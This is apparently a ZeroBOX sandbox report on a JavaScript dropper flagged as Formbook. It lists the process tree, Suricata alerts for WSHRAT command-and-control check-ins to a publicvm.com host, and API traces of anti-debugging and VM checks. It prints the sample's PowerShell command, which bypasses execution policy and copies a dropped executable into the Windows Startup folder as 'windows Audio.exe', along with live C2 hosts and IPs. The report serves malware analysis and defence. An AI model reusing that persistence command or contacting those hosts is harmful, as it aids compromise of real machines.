Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 19, 2023, 9:32 a.m.	Oct. 19, 2023, 9:35 a.m.

Size	764.5KB
Type	ASCII text, with very long lines, with CRLF, LF line terminators
MD5	`8d38022aafef200f061a873cad79fe61`
SHA256	`15921f2949858a67b8f01ac048ceed3083774b664549ea455d12eb8748049961`
CRC32	`C460749F`
ssdeep	`12288:0mg5I//JpJT4gN5fmTRkTZH661xOEWx6YLJSxy+uUyXEnOysvH5Mxr3WIUHmTGbd:bg5I/XhLa+TZHPYR9mDyX7ysSxr3WBBJ`
Yara	Win_Trojan_Formbook_Zero - Used Formbook hide_executable_file - Hide executable file

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\oneone.js
2556
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\Output.js"
  2684
  - vOb.exe "C:\Users\test22\AppData\Local\Temp\vOb.exe"
    2852
    - Powershell.exe "Powershell.exe" -ExecutionPolicy Bypass -command xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818= 'C:\Users\test22\AppData\Local\Temp\vOb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows Audio.exe'
      2960
    - vOb.exe "C:\Users\test22\AppData\Local\Temp\vOb.exe"
      3040

Name	Response	Post-Analysis Lookup
ftp.martur.cl	CNAME martur.cl A 187.49.9.55	187.49.9.55
chongmei33.publicvm.com	A 103.47.144.71	103.47.144.71
ip-api.com	A 208.95.112.1	208.95.112.1

IP Address	Status	Action
103.47.144.71	Active	Moloch
164.124.101.2	Active	Moloch
187.49.9.55	Active	Moloch
208.95.112.1	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 187.49.9.55:21 -> 192.168.56.101:49171	2260002	SURICATA Applayer Detect protocol only one direction	Generic Protocol Command Decode
UDP 192.168.56.101:54148 -> 164.124.101.2:53	2034457	ET POLICY Observed DNS Query to DynDNS Domain (publicvm .com)	Potentially Bad Traffic
TCP 192.168.56.101:49163 -> 208.95.112.1:80	2022082	ET POLICY External IP Lookup ip-api.com	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49180 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49172 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49165 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49165 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49186 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49184 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49185 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49178 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49192 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49192 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49192 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49190 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49183 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49181 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49182 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49187 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic
TCP 192.168.56.101:49188 -> 103.47.144.71:7045	2027447	ET MALWARE WSHRAT CnC Checkin	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 103.47.144.71:7045	2017516	ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 103.47.144.71:7045	2042823	ET INFO DYNAMIC_DNS HTTP Request to a *.publicvm .com Domain	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 19, 2023, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 19, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (5 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 19, 2023, 9:33 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 9:33 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 9:33 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 9:33 a.m.			0	0
IsDebuggerPresent Oct. 19, 2023, 9:33 a.m.			0	0

Command line console output was observed (27 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: The term 'xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENm console_handle: 0x00000023	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: Fl3GsolqcGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaec console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: B8P/FVecfW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/ console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: F68/W3GXggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD console_handle: 0x00000047	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: 4IjJQmV1gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4o console_handle: 0x00000053	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: Ty+f+VDOiQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZ console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: YnnZc0VCbJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjl console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: aVQk75pkxpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd console_handle: 0x00000077	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: 5227aIGAKGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818=' is not recogniz console_handle: 0x00000083	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: ed as the name of a cmdlet, function, script file, or operable program. Check t console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: he spelling of the name, or if a path was included, verify that the path is cor console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: rect and try again. console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: At line:1 char:685 console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: + xHpF2m2TxzO3qr4FIuPswPaRZvbKhAgsHoUgVc5c1AMOAI4xiJqOjlkD3YO/6qULkSENmFl3Gsolq console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: cGGkZrBbaRXVu7YY+n3wiyv8wS+UHUpwhx/IX6ZerqvTzuOLuRdO08npei7HwfH2wKRuaecB8P/FVec console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: fW9FoWjF1A6O/68O0qK192cnIhUcctWjx/GW8ULXo/Un0WwvyWYxGKqhFtUjf6hQETjLzO/F68/W3GX console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: ggNfn4E0tbsHcWJ4Qs9QeauMywyAB+V1+9Uw+hcoLBpcocrYAhSqf6iaaMKaTanR4JlGBlD4IjJQmV1 console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: gvQRYmjDXbZawN8IgwRgaI+xcKtFjiFVvuA6CawFF5jzi4mENimIA39OD54y/zMb7idEh4oTy+f+VDO console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: iQ16HbDvRyX1gv6ar2K+vNdRpiEk+FL75Dwi1y2R1DSLLrnXH75cn9Sxxkx16fkjltmZNwZYnnZc0VC console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: bJz5PE8snBKcKUEemoAvDwcgj8rVX1tuhqqeYXrhP1hn6oaUpa8dLV9GkxPvUPm2U2PxYjlaVQk75pk console_handle: 0x00000107	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: xpaspctI89cBy4lXgWn0XYPaK1+WjxY5j1F5jeSb75FxuowoTWUXfk8j1s2KbANCsBuN3nd5227aIGA console_handle: 0x00000113	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: KGm+1kHAm/4MePOuLnj7mVqVrGuW9smZZvnluk2n2p0v6RGPmD818= <<<< 'C:\Users\test22\A console_handle: 0x0000011f	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: ppData\Local\Temp\vOb.exe' 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\S console_handle: 0x0000012b	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: tart Menu\Programs\Startup\windows Audio.exe' console_handle: 0x00000137	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: + CategoryInfo : ObjectNotFound: (xHpF2m2TxzO3qr4...n2p0v6RGPmD81 console_handle: 0x00000143	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: 8=:String) [], CommandNotFoundException console_handle: 0x0000014f	1	1
WriteConsoleW Oct. 19, 2023, 9:33 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000015b	1	1

Uses Windows APIs to generate a cryptographic key (48 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c390 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063cc90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c810 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c450 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 9:33 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0063c510 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 19, 2023, 9:33 a.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
